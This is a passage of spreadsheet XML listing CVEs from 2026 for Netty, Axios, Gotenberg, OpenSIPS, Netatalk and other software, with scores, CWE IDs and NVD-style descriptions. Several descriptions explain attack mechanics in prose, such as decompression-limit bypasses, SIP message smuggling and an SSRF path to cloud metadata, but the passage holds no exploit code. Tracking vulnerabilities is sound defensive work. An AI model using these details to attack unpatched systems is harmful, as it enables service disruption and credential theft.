      <c r="B2591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42536</t>
        </is>
      </c>
      <c r="C2591" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2591" s="5" t="inlineStr"/>
      <c r="F2591" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2591" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H2591" s="5" t="inlineStr">
        <is>
          <t>apache:http_server</t>
        </is>
      </c>
      <c r="I2591" s="5" t="inlineStr">
        <is>
          <t>2026-06-08</t>
        </is>
      </c>
      <c r="J2591" s="5" t="inlineStr"/>
      <c r="K2591" s="5" t="inlineStr">
        <is>
          <t>CWE-120, CWE-122</t>
        </is>
      </c>
      <c r="L2591" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42536</t>
        </is>
      </c>
    </row>
    <row r="2592">
      <c r="A2592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42587</t>
        </is>
      </c>
      <c r="C2592" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2592" s="5" t="inlineStr"/>
      <c r="F2592" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2592" s="5" t="inlineStr"/>
      <c r="H2592" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2592" s="5" t="inlineStr">
        <is>
          <t>2026-05-13</t>
        </is>
      </c>
      <c r="J2592" s="5" t="inlineStr"/>
      <c r="K2592" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2592" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.</t>
        </is>
      </c>
      <c r="M2592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42587</t>
        </is>
      </c>
    </row>
    <row r="2593">
      <c r="A2593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43003</t>
        </is>
      </c>
      <c r="C2593" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2593" s="5" t="inlineStr"/>
      <c r="F2593" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2593" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2593" s="5" t="inlineStr">
        <is>
          <t>openstack:ironic_python_agent</t>
        </is>
      </c>
      <c r="I2593" s="5" t="inlineStr">
        <is>
          <t>2026-05-01</t>
        </is>
      </c>
      <c r="J2593" s="5" t="inlineStr"/>
      <c r="K2593" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-829</t>
        </is>
      </c>
      <c r="L2593" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in OpenStack ironic-python-agent 1.0.0 through 11.5.0. Ironic Python Agent (IPA) sometimes executes grub-install from within a chroot of the deployed partition image, leading to code execution in the case of a malicious image.</t>
        </is>
      </c>
      <c r="M2593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43003</t>
        </is>
      </c>
    </row>
    <row r="2594">
      <c r="A2594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44250</t>
        </is>
      </c>
      <c r="C2594" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2594" s="5" t="inlineStr"/>
      <c r="F2594" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2594" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2594" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2594" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2594" s="5" t="inlineStr"/>
      <c r="K2594" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2594" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending a crafted Redis payload with deeply nested arrays. This forces the server to allocate a massive number of state objects and collections, leading to memory exhaustion and an OutOfMemoryError. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44250</t>
        </is>
      </c>
    </row>
    <row r="2595">
      <c r="A2595" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44486</t>
        </is>
      </c>
      <c r="C2595" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2595" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2595" s="5" t="inlineStr"/>
      <c r="F2595" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2595" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2595" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2595" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2595" s="5" t="inlineStr"/>
      <c r="K2595" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-201</t>
        </is>
      </c>
      <c r="L2595" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios’ Node.js HTTP adapter can leak proxy credentials to a redirect target in affected versions. When a request is sent through an authenticated proxy, Axios may add a Proxy-Authorization header. If Axios then follows a redirect and the redirected request is no longer sent through that proxy, the stale Proxy-Authorization header can remain on the redirected request and be sent to the redirect target. This affects Node.js's use of Axios with automatic redirects enabled and an authenticated proxy configuration. Browser adapters are not affected. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M2595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44486</t>
        </is>
      </c>
    </row>
    <row r="2596">
      <c r="A2596" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44488</t>
        </is>
      </c>
      <c r="C2596" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2596" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2596" s="5" t="inlineStr"/>
      <c r="F2596" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2596" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2596" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2596" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2596" s="5" t="inlineStr"/>
      <c r="K2596" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2596" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Axios versions 1.7.0 through 1.15.x did not enforce configured request and response size limits when requests were sent with the fetch adapter. Applications that selected adapter: 'fetch', or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than maxContentLength or maxBodyLength despite those limits being explicitly configured. This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large data: URL, or when an application forwards attacker-controlled request bodies through axios while relying on maxBodyLength as a boundary. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M2596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44488</t>
        </is>
      </c>
    </row>
    <row r="2597">
      <c r="A2597" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44496</t>
        </is>
      </c>
      <c r="C2597" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2597" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2597" s="5" t="inlineStr"/>
      <c r="F2597" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2597" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2597" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2597" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2597" s="5" t="inlineStr"/>
      <c r="K2597" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="L2597" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Axios versions before 0.32.0 on the 0.x line and before 1.16.0 on the 1.x line build a regular expression from the configured XSRF cookie name without escaping regex metacharacters. In standard browser environments, an attacker who can influence the cookie name passed to axios can cause expensive regex backtracking while axios reads document.cookie. The practical impact is client-side availability degradation, such as freezing the affected browser tab while axios prepares a request. The issue does not affect ordinary Node.js HTTP adapter usage, React Native, or web workers, where axios does not read document.cookie. This vulnerability is fixed in 0.32.0 and 1.16.0.</t>
        </is>
      </c>
      <c r="M2597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44496</t>
        </is>
      </c>
    </row>
    <row r="2598">
      <c r="A2598" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44673</t>
        </is>
      </c>
      <c r="C2598" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2598" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2598" s="5" t="inlineStr"/>
      <c r="F2598" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2598" s="5" t="inlineStr"/>
      <c r="H2598" s="5" t="inlineStr"/>
      <c r="I2598" s="5" t="inlineStr">
        <is>
          <t>2026-05-14</t>
        </is>
      </c>
      <c r="J2598" s="5" t="inlineStr"/>
      <c r="K2598" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2598" s="5" t="inlineStr">
        <is>
          <t>libyang is a YANG data modeling language library. Prior to SO 5.2.15, lyb_read_string() in src/parser_lyb.c contains an integer overflow that results in a heap buffer overflow when parsing a maliciously crafted LYB binary blob. An attacker who can supply LYB data to any libyang consumer (NETCONF server, sysrepo, etc.) can trigger a crash or potential heap corruption. This vulnerability is fixed in SO 5.2.15.</t>
        </is>
      </c>
      <c r="M2598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44673</t>
        </is>
      </c>
    </row>
    <row r="2599">
      <c r="A2599" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44890</t>
        </is>
      </c>
      <c r="C2599" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2599" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2599" s="5" t="inlineStr"/>
      <c r="F2599" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2599" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H2599" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2599" s="5" t="inlineStr">
        <is>
          <t>2026-06-11</t>
        </is>
      </c>
      <c r="J2599" s="5" t="inlineStr"/>
      <c r="K2599" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2599" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-redis prior to versions 4.1.135.Final and 4.2.15.Final, an attacker can cause DoS by sending crafted Redis payloads across multiple connections without `\r\n`. This exhausts the server's direct memory pool (OutOfDirectMemoryError), preventing legitimate connections from being processed. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44890</t>
        </is>
      </c>
    </row>
    <row r="2600">
      <c r="A2600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44893</t>
        </is>
      </c>
      <c r="C2600" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2600" s="5" t="inlineStr"/>
      <c r="F2600" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2600" s="5" t="inlineStr"/>
      <c r="H2600" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2600" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2600" s="5" t="inlineStr"/>
      <c r="K2600" s="5" t="inlineStr">
        <is>
          <t>CWE-703, CWE-805</t>
        </is>
      </c>
      <c r="L2600" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. In netty-codec-haproxy prior to versions 4.1.135.Final and 4.2.15.Final, when decoding a PP2_TYPE_SSL TLV, HAProxyMessage.readNextTLV() first calls `header.retainedSlice(header.readerIndex(), length)` and only then reads the 1-byte client field and 4-byte verify field. If the attacker sets the TLV length below 5, the subsequent readByte/readInt throws IndexOutOfBoundsException. HAProxyMessageDecoder only catches HAProxyProtocolException around this call, so the IOOBE propagates and the retained slice on the pooled cumulation buffer is never released. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44893</t>
        </is>
      </c>
    </row>
    <row r="2601">
      <c r="A2601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45103</t>
        </is>
      </c>
      <c r="C2601" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2601" s="5" t="inlineStr"/>
      <c r="F2601" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2601" s="5" t="inlineStr"/>
      <c r="H2601" s="5" t="inlineStr"/>
      <c r="I2601" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2601" s="5" t="inlineStr"/>
      <c r="K2601" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2601" s="5" t="inlineStr">
        <is>
          <t>OpenSIPS is a Session Initiation Protocol (SIP) server implementation. In versions prior to 3.6.6 and 4.0.0-rc1, the TCP message framing layer parses the Content-Length header using unsigned int arithmetic with no overflow check. When an attacker sends a Content-Length value that overflows unsigned int (e.g., 4294967296), the framing layer computes a wrapped-around value (e.g., 0) and splits the TCP stream at the wrong boundary, causing the body of the first SIP message to be processed as a separate message and enabling SIP message smuggling. Because Content-Length is parsed in the transport layer before authentication, an unauthenticated, network-based attacker can smuggle arbitrary SIP messages over any TCP-based transport (proto_tcp, proto_tls, proto_ws, proto_wss) on any instance with TCP enabled, with no routing-script preconditions. This allows smuggled messages to bypass front-end SBC/proxy security policies, inherit the connection's authentication context, and evade rate limiting. This issue has been fixed in versions 3.6.6 and 4.0.0-rc1.</t>
        </is>
      </c>
      <c r="M2601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45103</t>
        </is>
      </c>
    </row>
    <row r="2602">
      <c r="A2602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45378</t>
        </is>
      </c>
      <c r="C2602" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2602" s="5" t="inlineStr"/>
      <c r="F2602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2602" s="5" t="inlineStr"/>
      <c r="H2602" s="5" t="inlineStr"/>
      <c r="I2602" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2602" s="5" t="inlineStr"/>
      <c r="K2602" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2602" s="5" t="inlineStr">
        <is>
          <t>Decidim is a participatory democracy framework. Prior to 0.30.9, from 0.31.0 before 0.31.5, and in 0.32.0.rc1 before 0.32.0.rc2, the identity-document verification admin UI embeds verification_attachment blobs through reusable signed Active Storage disk URLs, allowing anyone who obtains a URL to download the scanned document without an authenticated Decidim session until the signature expires. Verification-document images are rendered with variant_url(...), which produces signed /rails/active_storage/disk/... links instead of routing the file through an authorization-checking controller. Because Decidim configures Active Storage service URLs to remain valid for seven days, the URL itself becomes the credential for that period. The affected files are verification_attachment blobs on Decidim::Authorization, and the admin review pages embed those signed URLs directly into the HTML for pending and confirmation views. This issue is fixed in versions 0.30.9, 0.31.5, and 0.32.0.rc2.</t>
        </is>
      </c>
      <c r="M2602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45378</t>
        </is>
      </c>
    </row>
    <row r="2603">
      <c r="A2603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45416</t>
        </is>
      </c>
      <c r="C2603" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2603" s="5" t="inlineStr"/>
      <c r="F2603" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G2603" s="5" t="inlineStr"/>
      <c r="H2603" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2603" s="5" t="inlineStr">
        <is>
          <t>2026-06-12</t>
        </is>
      </c>
      <c r="J2603" s="5" t="inlineStr"/>
      <c r="K2603" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2603" s="5" t="inlineStr">
        <is>
          <t>Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, SslClientHelloHandler.decode() reads the 24-bit TLS handshake length and, when the ClientHello does not fit in the first record, eagerly allocates `ctx.alloc().buffer(handshakeLength)` (line 161). The guard at line 140 is `handshakeLength &gt; maxClientHelloLength &amp;&amp; maxClientHelloLength != 0`, and the commonly-used SniHandler/AbstractSniHandler constructors (SniHandler(Mapping), SniHandler(AsyncMapping), AbstractSniHandler()) pass maxClientHelloLength=0 and handshakeTimeoutMillis=0, so the length guard is disabled and no timeout is scheduled. A 16 MiB request exceeds the default pooled chunk size and becomes a huge/unpooled allocation performed immediately. The buffer is retained in the handler until the channel closes. Versions 4.1.135.Final and 4.2.15.Final patch the issue.</t>
        </is>
      </c>
      <c r="M2603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45416</t>
        </is>
      </c>
    </row>
    <row r="2604">
      <c r="A2604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45698</t>
        </is>
      </c>
      <c r="C2604" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2604" s="5" t="inlineStr"/>
      <c r="F2604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2604" s="5" t="inlineStr"/>
      <c r="H2604" s="5" t="inlineStr"/>
      <c r="I2604" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J2604" s="5" t="inlineStr"/>
      <c r="K2604" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L2604" s="5" t="inlineStr">
        <is>
          <t>Netatalk is a Free and Open Source file server suite for Unix-like operating systems. In versions 3.1.19 through 4.4.2, a stack-based buffer overflow exists in the deletedir() function of Netatalk's afpd daemon due to an integer underflow in the calculation of the remaining buffer size used for path construction. deletedir() is a utility function called when a file operation crosses a device boundary inside an AFP shared volume, which the standard library's renameat() cannot handle. The function attempts to prevent buffer overflows by tracking available space in a size_t remain variable. However, the arithmetic used to compute remain results in an unsigned integer underflow, causing the variable to become SIZE_MAX. Because of this, the subsequent boundary check always evaluates as safe, allowing an unbounded strcpy() operation to copy attacker-controlled filenames into a nearly full stack buffer. Version 4.4.3 patches the issue.</t>
        </is>
      </c>
      <c r="M2604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45698</t>
        </is>
      </c>
    </row>
    <row r="2605">
      <c r="A2605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45736</t>
        </is>
      </c>
      <c r="C2605" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2605" s="5" t="inlineStr"/>
      <c r="F2605" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2605" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2605" s="5" t="inlineStr">
        <is>
          <t>ws_project:ws</t>
        </is>
      </c>
      <c r="I2605" s="5" t="inlineStr">
        <is>
          <t>2026-05-15</t>
        </is>
      </c>
      <c r="J2605" s="5" t="inlineStr"/>
      <c r="K2605" s="5" t="inlineStr">
        <is>
          <t>CWE-824, CWE-908</t>
        </is>
      </c>
      <c r="L2605" s="5" t="inlineStr">
        <is>
          <t>ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.</t>
        </is>
      </c>
      <c r="M2605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45736</t>
        </is>
      </c>
    </row>
    <row r="2606">
      <c r="A2606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45741</t>
        </is>
      </c>
      <c r="C2606" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2606" s="5" t="inlineStr"/>
      <c r="F2606" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2606" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2606" s="5" t="inlineStr"/>
      <c r="I2606" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2606" s="5" t="inlineStr"/>
      <c r="K2606" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-918</t>
        </is>
      </c>
      <c r="L2606" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. In 8.32.0 and earlier, the IsPublicIP function in pkg/gotenberg/outbound.go does not reject the 2002::/16 6to4 prefix, the 64:ff9b::/96 and 64:ff9b:1::/48 NAT64 prefixes, the fec0::/10 deprecated site-local prefix, Teredo, and other transition prefixes that can embed or route to non-public IPv4 destinations. The addr.Unmap operation only handles IPv4-mapped IPv6 addresses, so a crafted DNS AAAA record can cause the outbound HTTP client to treat an address wrapping an internal destination such as 169.254.169.254 as public. An unauthenticated attacker can use a conversion route with WithDenyPrivateIPs enabled to reach cloud metadata services, and the Chromium URL conversion route can return the internal response as a PDF, potentially exposing cloud credentials. Exploitation requires a deployment whose host routes the relevant IPv6 prefix, such as a dual-stack or NAT64-enabled environment. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M2606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45741</t>
        </is>
      </c>
    </row>
    <row r="2607">
      <c r="A2607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45742</t>
        </is>
      </c>
      <c r="C2607" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2607" s="5" t="inlineStr"/>
      <c r="F2607" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2607" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H2607" s="5" t="inlineStr"/>
      <c r="I2607" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J2607" s="5" t="inlineStr"/>
      <c r="K2607" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2607" s="5" t="inlineStr">
        <is>
          <t>Gotenberg is a Docker-powered stateless API for PDF files. From 8.10.0 until 8.33.0, the newContext function in pkg/modules/api/context.go starts one errgroup.Go goroutine for each multipart downloadFrom entry and allows those goroutines to concurrently write to the shared ctx.files, ctx.diskToOriginal, and ctx.filesByField maps and slices. Go maps and slices are not safe for concurrent mutation, so a crafted multipart request containing many downloadFrom entries can trigger a data race and terminate the process with a fatal concurrent map writes runtime error. The default configuration enables downloadFrom and disables authentication, allowing an unauthenticated remote attacker to crash an exposed conversion service and cause a denial of service. This issue is fixed in version 8.33.0.</t>
        </is>
      </c>
      <c r="M2607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45742</t>
        </is>
      </c>
    </row>
    <row r="2608">
      <c r="A2608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45747</t>
        </is>
      </c>
      <c r="C2608" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2608" s="5" t="inlineStr"/>
      <c r="F2608" s="5" t="inlineStr"/>
      <c r="G2608" s="5" t="inlineStr"/>
      <c r="H2608" s="5" t="inlineStr"/>
      <c r="I2608" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2608" s="5" t="inlineStr"/>
      <c r="K2608" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L2608" s="5" t="inlineStr">
        <is>
          <t>Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to version 7.0.16, the Lua TLS certificate information helper could dereference NULL certificate fields when a Lua script requested certificate information for TLS traffic where some certificate fields were absent. Crafted TLS traffic processed by a deployment using affected Lua TLS scripting could crash Suricata, resulting in denial of service. Version 7.0.16 contains a fix. As a workaround, avoid Lua scripts that call TLS certificate information helpers on untrusted traffic (`TlsGetCertInfo` function), or update scripts to handle missing certificate fields where possible.</t>
        </is>
      </c>
      <c r="M2608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45747</t>
        </is>
      </c>
    </row>
    <row r="2609">
      <c r="A2609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45759</t>
        </is>
      </c>
      <c r="C2609" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2609" s="5" t="inlineStr"/>
